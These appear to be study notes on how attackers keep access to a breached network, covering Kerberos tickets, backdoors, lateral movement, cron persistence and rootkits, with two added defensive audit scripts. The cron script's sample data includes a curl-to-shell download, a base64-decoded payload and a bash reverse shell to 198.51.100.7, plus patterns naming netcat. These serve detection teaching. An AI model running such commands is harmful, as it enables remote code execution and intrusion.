Backdoors (opening ports)
Pivoting / Lateral Movement
Exfiltration of Information
Create New Accounts
Scheduled Tasks / Cron Jobs
Trojan Horse Malware
Answer: Maintaining Access
Golden Tickets: Kerberos is the network authentication protocol used inside Windows Active Directory domains (and on many Unix networks). Instead of sending a password to every server, a user proves their identity once to the domain controller's Key Distribution Center and receives a Ticket-Granting Ticket (TGT), which is then used to request service tickets for individual servers. The TGT is encrypted with the key of the domain's krbtgt account, so an attacker who has stolen that key (normally by dumping it from a domain controller) can forge TGTs for any user, with any group membership and any lifetime. Such a forged TGT is a Golden Ticket. It is a skeleton key for the whole domain: every service trusts it, and it stays valid until the krbtgt password has been changed twice (the previous key is also accepted), which is why recovering from one means rotating krbtgt rather than resetting the account it impersonates.
Silver Tickets: A Silver Ticket is a forged service ticket rather than a forged TGT. Service tickets are encrypted with the key of the account that runs the service (for example, a computer account's key for the file service on that machine), so an attacker who has that key can forge a ticket for one service on one host without ever contacting the domain controller. The reach is narrower than a Golden Ticket, but it is quieter: no ticket request appears in the domain controller's logs, so detection has to happen on the target host itself.
Backdoors (opening ports): A backdoor is any way into a system that bypasses its normal authentication. In software it may be a hidden account or credential left in by the programmers. On a compromised host it is usually a service the attacker starts that listens on a network port (a bind shell, a second SSH daemon on an unusual port, a web shell) so they can come back later without exploiting anything again. Ports are how network services are reached, and every listening port is a potential entry point, so an unexpected listener is both attack surface and a sign of compromise. Services that are not needed should be stopped and their ports blocked at the firewall, and the list of listening ports should be checked regularly against what the machine is actually supposed to run.
Pivoting / Lateral Movement: An initial foothold is usually on an unimportant machine with an ordinary user's privileges. Lateral movement is the attacker's progress from that host to others in the network, reusing whatever can be harvested on each one (cached credentials, password hashes, Kerberos tickets, SSH keys) to log in to the next. Pivoting is the related trick of routing traffic through a compromised host so the attacker can reach internal networks their own machine cannot see. The usual goal is administrator access (domain admin, root), and every new credential makes the next hop easier, which is why responding means cutting off the spread rather than cleaning one machine.
Exfiltration of Information: Companies and organizations store valuable information on their systems, and attackers want to copy it from the target's systems to their own. That copying is data exfiltration, which is simply data theft. The old-school way was loud and fast: break in, transfer as much data as possible as quickly as possible, and get out. Advanced threat actors today take the slow and stealthy route: get in without anybody noticing, move laterally to where the valuable data lives, and then leak it out in small amounts disguised as ordinary traffic (web uploads, DNS queries, cloud storage) so that nothing stands out in the network logs. Intruders have been found inside networks months, even years, after they first got in.
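One way to do the check the paragraph above calls for, as an added example (not code from the original notes): a shell function that reads listening-socket lines in the format of `ss -Hltn` and prints every TCP port that is not on an allowlist of expected services. The sample socket table is constructed for the example; the ports and addresses in it are not from any real host.

```shell
#!/bin/sh
# Added example (not from the original notes): compare a host's listening
# TCP ports against an allowlist of the services it is supposed to run.
# Input lines use the `ss -Hltn` layout: State Recv-Q Send-Q Local Peer.
# The sample below is constructed for this example.

SAMPLE_SS='LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 511 *:443 *:*
LISTEN 0 128 127.0.0.1:4444 0.0.0.0:*
LISTEN 0 1 [::]:31337 [::]:*
'

# audit_listeners reads ss-style lines on stdin and prints each listening
# port that does not appear in the space-separated allowlist given as $1.
audit_listeners() {
  allow=" $1 "
  # column 4 is the local address; the port is whatever follows the last colon,
  # which also handles IPv6 addresses such as [::]:31337
  awk '{ print $4 }' | sed 's/.*://' | sort -un | while IFS= read -r port; do
    case "$allow" in
      *" $port "*) ;;                 # expected service, nothing to report
      *) printf '%s\n' "$port" ;;     # unexpected listener: investigate it
    esac
  done
}

# Stand-alone run: with only SSH and HTTPS expected, the two unexpected
# listeners (4444 on localhost and 31337 on IPv6) are printed.
printf '%s' "$SAMPLE_SS" | audit_listeners '22 443'
```

On a live system replace the sample with the output of `ss -Hltnp` (or `netstat -tlnp` on older hosts) so the owning process is shown as well. A listener bound only to 127.0.0.1 is not automatically harmless: that is exactly where a forwarded port from a pivoting attacker tends to sit.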
Creating New Accounts:
Scheduled Tasks / Cron Jobs: If you had a robot that you could program to do your chores on a regular basis, would you? Of course you would! Scheduled tasks are jobs a system administrator programs to run at set times or intervals: cron on Unix and Linux, Task Scheduler on Windows, and systemd timers on modern Linux. They do useful things like running backups at 2 a.m. or fetching updates every night.
However, schedulers are also a favourite persistence mechanism. An attacker who can write to a crontab or create a scheduled task gets their tool re-run every few minutes, or at every boot, even after the original process is killed or the machine is restarted. Auditing scheduled jobs (who owns each one, what it runs, and where that executable lives) is a basic part of checking whether a system has been compromised.
Cron takes its name from the Greek word chronos, meaning time, so cron jobs really are time jobs!
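The audit the passage above describes, as an added example (not code from the original notes): a shell function that reads crontab text on standard input and flags entries matching a handful of heuristic patterns for attacker persistence (download-and-execute pipelines, executables in world-writable directories, base64-decoded payloads, reverse shells). The pattern list is this example's own choice and is deliberately short, and the sample crontab is constructed for it; 198.51.100.7 is a documentation address, not a real host.

```shell
#!/bin/sh
# Added example (not from the original notes): flag crontab entries that
# look like attacker persistence. The patterns are this example's own
# heuristics, and the sample crontab is constructed for it.

SAMPLE_CRONTAB='# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
*/10 * * * * curl -s http://198.51.100.7/x.sh | sh
@reboot /dev/shm/.x/run
30 3 * * 0 echo aGVsbG8= | base64 -d | sh
0 * * * * bash -i >& /dev/tcp/198.51.100.7/4444 0>&1
'

# audit_cron reads crontab text on stdin and prints one line per suspicious
# entry, prefixed with the reason it was flagged. Comments and blank lines
# are skipped; an entry that matches no pattern is silently accepted.
audit_cron() {
  grep -Ev '^[[:space:]]*#|^[[:space:]]*$' | while IFS= read -r line; do
    if printf '%s\n' "$line" | grep -Eq '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh'; then
      # fetches code from the network and pipes it straight into a shell
      printf 'download-and-execute: %s\n' "$line"
    elif printf '%s\n' "$line" | grep -Eq '(^|[[:space:]])(/tmp|/dev/shm|/var/tmp)/'; then
      # the program lives in a directory any user can write to
      printf 'world-writable-dir: %s\n' "$line"
    elif printf '%s\n' "$line" | grep -Eq 'base64[[:space:]]+(-d|--decode)'; then
      # the real command is hidden behind an encoding step
      printf 'encoded-payload: %s\n' "$line"
    elif printf '%s\n' "$line" | grep -Eq '/dev/tcp/|(^|[[:space:]])(nc|ncat|netcat)[[:space:]].*-e[[:space:]]'; then
      # opens a connection back to an attacker-controlled host
      printf 'reverse-shell: %s\n' "$line"
    fi
  done
}

# Stand-alone run: prints the four flagged entries; the backup job passes.
printf '%s' "$SAMPLE_CRONTAB" | audit_cron
```

On a real host, feed it `crontab -l` for each user plus /etc/crontab and the files under /etc/cron.d and the cron.hourly, daily, weekly and monthly directories; systemd timers (`systemctl list-timers --all`) and, on Windows, `schtasks /query /fo LIST /v` deserve the same scrutiny. A clean result proves nothing on its own; the point is to shortlist entries for a person to read.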
Trojan Horse Malware: In the Greek legend, the Greeks besieged Troy for years without breaching its walls, until they built a hollow wooden horse, hid soldiers inside, and left it as a gift; the Trojans dragged it into the city themselves. Trojan malware works on the same principle: a program that looks legitimate (a cracked application, a document with macros, a fake update) but carries a hidden payload such as a rootkit, a remote access tool or a credential stealer. Unlike a virus or a worm, a Trojan does not spread by itself; it relies on the victim to run it. Be careful what you download and run, and check installers against the publisher's signature or published checksum, because you cannot tell from the outside what is hidden inside an executable file.
Rootkits: A particularly vicious type of malware is a rootkit, which is designed to keep privileged access to a computer while hiding its own presence. The name comes from "root", the highest-privilege account on Unix systems: a rootkit runs with root (or kernel, or even firmware) privileges, which the attacker has normally obtained by some other means first, and uses them to hide its processes, files, network connections and log entries from the very tools an administrator would use to look for them. Because it sits inside or below the operating system, a rootkit can lie to everything above it, which is why a machine with a suspected rootkit is usually rebuilt from known-good media rather than cleaned in place.
Information Modification: Attackers do not only steal data; they can also change it. Imagine a company whose value lies in its patents, source code or financial records, and an intruder who quietly edits those files: corrupting a design, slipping a backdoor into the code base, or altering transaction records. The damage can be worse than theft, because the company may act on bad data for a long time before noticing, and business could be disrupted or halted, possibly permanently. Integrity is one of the three properties (with confidentiality and availability) that a break-in can destroy, and information modification is one of the many risks of getting hacked.